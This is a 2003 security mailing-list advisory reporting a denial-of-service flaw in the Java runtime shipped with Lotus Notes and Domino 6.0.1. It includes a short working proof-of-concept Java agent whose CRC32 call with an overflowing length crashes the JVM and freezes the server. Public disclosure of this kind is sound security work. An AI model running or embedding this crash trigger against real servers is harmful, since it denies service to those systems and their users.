Vulnwatch mailing list archives
Java Agent freezes Lotus Notes and Domino 6.0.1 (fwd)
From: Marc Schoenefeld <schonef () uni-muenster de>
Date: Sun, 6 Apr 2003 23:11:27 +0200 (MES)
Hi,

the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1 and Lotus Notes 6.0.1 to crash. After calling the agent a huge amount of memory is not freed and causes the server machine (observed on MS XP) to freeze and deny further service.

IMPLICATIONS:
- If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
- if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.

ANALYSIS:
The call to the "update" method of the CRC32 raises an integer overflow in the Java java.util.zip.* core libraries which triggers a JNI routine that cannot handle the extremely high input value.

HISTORY:
This vulnerability has already been detected in the Sun JDK (http://developer.java.sun.com/developer/bugParade/bugs/4811913.html), and was disclosed at Blackhat Windows 2003. The background of this bug is described at www.illegalaccess.org

Sincerely
Marc Schoenefeld

=========================Agent Source Code===========================
import lotus.domino.*;
import java.util.zip.*;

public class JavaAgent extends AgentBase {

    public void NotesMain() {
        try {
            Session session = getSession();
            AgentContext agentContext = session.getAgentContext();
            CRC32 crc32 = new CRC32();
            crc32.update(new byte[0], 4, 0x7ffffffc);
            // (Your code goes here)
        } catch(Exception e) {
            e.printStackTrace();
        }
    }
}
=========================Agent Source Code===========================

--
Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
[ PGP Signature ok - Sun Apr 6 23:10:07 MES 2003 ]